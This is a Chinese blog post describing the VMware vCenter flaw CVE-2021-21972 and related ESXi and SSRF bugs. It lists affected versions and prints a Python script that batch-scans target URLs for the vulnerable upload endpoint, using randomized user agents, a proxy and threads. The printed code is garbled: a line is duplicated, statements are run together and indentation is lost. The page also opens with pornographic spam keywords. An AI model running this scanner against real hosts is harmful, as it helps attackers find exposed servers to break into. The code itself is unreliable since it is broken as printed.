黄色网站入口国产美女,精品国产欧美另类一区,国产一区二区美女自慰,日日摸夜夜添无码国产

選擇你喜歡的標(biāo)簽
我們會(huì)為你匹配適合你的網(wǎng)址導(dǎo)航

    確認(rèn) 跳過(guò)

    跳過(guò)將刪除所有初始化信息

    Vmware vcenter未授權(quán)任意文件上傳

    安全 2021-11-29 14:06

    聲明:該文章由作者(葉辰)發(fā)表,轉(zhuǎn)載此文章須經(jīng)作者同意并請(qǐng)附上出處(0XUCN)及本頁(yè)鏈接。。

    描述

    2021年02月24日,某些平臺(tái)監(jiān)測(cè)到 Vmware官方發(fā)布了vCenter Server安全更新,修復(fù)了vSphereClient (HTML5)在vCenter Server插件vRealizeOperations(vROps)中的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2021-21972)。VMware?vCenter Server是美國(guó)威睿(VMware)公司的一套服務(wù)器和虛擬化管理軟件。該軟件提供了一個(gè)用于管理VMware vCenter環(huán)境的集中式平臺(tái),可自動(dòng)實(shí)施和交付虛擬基礎(chǔ)架構(gòu)。攻擊者可通過(guò)訪問(wèn)web管理端向vCenter Server發(fā)送請(qǐng)求從而在操作系統(tǒng)上執(zhí)行任意命令或者上傳一個(gè)webshell到vcenter服務(wù)器的任意位置執(zhí)行

    具有網(wǎng)絡(luò)訪問(wèn)端口443的惡意行為者可能會(huì)利用此問(wèn)題在托管vCenter Server的基礎(chǔ)操作系統(tǒng)上以不受限制的特權(quán)執(zhí)行命令。這會(huì)影響VMware vCenter Server(7.0 U1c之前的7.x,6.7 U3l之前的6.7和6.5 U3n之前的6.5)和VMware Cloud Foundation(4.2.3之前的4.x和3.10.1.2之前的3.x)。

    此外,VMware還修復(fù)了VMware ESXi中一個(gè)重要的堆溢出漏洞(CVE-2021-21974)與VMware vSphere中的一個(gè)SSRF漏洞(CVE-2021-21973)。

    據(jù)了解

    在 CVE-2021-21972 VMware vCenter Server 遠(yuǎn)程代碼漏洞 中,攻擊者可直接通過(guò)443端口構(gòu)造惡意請(qǐng)求,執(zhí)行任意代碼,控制vCenter。

    在 CVE-2021-21974 VMware ESXI 堆溢出漏洞 中,攻擊者可通過(guò)427端口構(gòu)造惡意請(qǐng)求,觸發(fā)OpenSLP服務(wù)中的堆溢出漏洞,并可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行。

    在 CVE-2021-21973 VMware vCenter Server SSRF漏洞 中,攻擊者可通過(guò)443端口發(fā)送惡意POST請(qǐng)求,發(fā)起內(nèi)網(wǎng)掃描,造成SSRF漏洞。

    影響版本

    VMware vCenter Server 7.0系列 < 7.0.U1c

    VMware vCenter Server 6.7系列 < 6.7.U3l

    VMware vCenter Server 6.5系列 < 6.5 U3n

    VMware ESXi 7.0系列 < ESXi70U1c-17325551

    VMware ESXi 6.7系列 < ESXi670-202102401-SG

    VMware ESXi 6.5系列 < ESXi650-202102101-SG

    驗(yàn)證POC

    使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC腳本批量驗(yàn)證

    import threadpool
    import random
    import requests
    import argparse
    import http.client
    import urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    http.client.HTTPConnection._http_vsn = 10
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"def get_ua():
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
                  )
    return ua
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
                  )
    return ua
    def CVE_2021_21972(url):
    proxies = {"scoks5": "http://127.0.0.1:1081"}
    headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
    }
    targetUrl = url + TARGET_URI
    try:
    res = requests.get(targetUrl,
    headers=headers,
    timeout=15,
    verify=False,
    proxies=proxies)
    # proxies={'socks5': 'http://127.0.0.1:1081'})
    # print(len(res.text))
    if res.status_code == 405:
    print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
    # print("[+] Command success result: " + res.text + "\n")
    with open("存在漏洞地址.txt", 'a') as fw:
    fw.write(url + '\n')
    else:
    print("[-] " + url + " 沒(méi)有發(fā)現(xiàn)CVE-2021-21972漏洞.\n")
    # except Exception as e:
    #     print(e)
    except:
    print("[-] " + url + " Request ERROR.\n")
    def multithreading(filename, pools=5):
    works = []
    with open(filename, "r") as f:
    for i in f:
    func_params = [i.rstrip("\n")]
    # func_params = [i] + [cmd]
    works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(CVE_2021_21972, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
    "--url",
    help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
    "--file",
    help="Url File; Example:url.txt")
    # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
    args = parser.parse_args()
    url = args.url
    # cmd = args.cmd
    file_path = args.file
    if url != None and file_path ==None:
    CVE_2021_21972(url)
    elif url == None and file_path != None:
    multithreading(file_path, 10)  # 默認(rèn)15線程if name == "main":
    main()
    
    


    關(guān)注我們

    [超站]友情鏈接:

    四季很好,只要有你,文娛排行榜:https://www.yaopaiming.com/
    關(guān)注數(shù)據(jù)與安全,洞悉企業(yè)級(jí)服務(wù)市場(chǎng):https://www.ijiandao.com/

    圖庫(kù)